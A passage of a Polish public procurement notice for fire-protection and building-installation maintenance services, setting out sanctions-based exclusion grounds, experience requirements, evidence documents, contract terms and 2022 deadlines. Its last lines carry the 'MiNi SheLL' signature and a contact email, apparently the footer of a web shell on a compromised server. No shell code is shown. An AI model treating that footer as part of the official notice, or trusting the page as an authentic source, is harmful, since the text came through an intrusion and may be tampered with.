kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Zgodnie z treścią art. 7 ust. 1 w/w ustawy, z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>3)	spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>c)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>d)	zdolności technicznej lub zawodowej: <br/>e)	Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej dwie usługi serwisowe w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia, w szczególności w zakresie: usług ochrony przeciwpożarowej lub napraw i konserwacji instalacji budynków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Oświadczenie o niepodleganiu wykluczeniu zgodnie z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp i art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, składane na podstawie art. 125 ust. 1 ustawy Pzp ( załącznik nr 4).<br/>2.Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Posiadanie zdolności technicznej lub zawodowej w zakresie świadczenia usług w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia - na podstawie wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; tj.: wykonanie co najmniej dwóch usług w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia, polegające na usłudze ochrony przeciwpożarowej lub napraw i konserwacji instalacji budynków na kwotę minimum: 60 000,00 zł<br/>każda z usług.<br/>2.Dysponowanie osobami posiadającymi wymagane uprawnienia do wykonywania przedmiotowego zamówienia - na podstawie oświadczenia, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, zgodnie z obowiązującymi przepisami i normami.<br/>3.Na podstawie wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia (załącznik nr 7 do SWZ)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>Do oferty wspólnej wykonawcy dołączają pełnomocnictwo.<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, że nie podlegają wykluczeniu zgodnie z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp i art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz spełniają warunki udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <br/>W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 5 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> art.455 ust.1-2 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-02 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-02 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com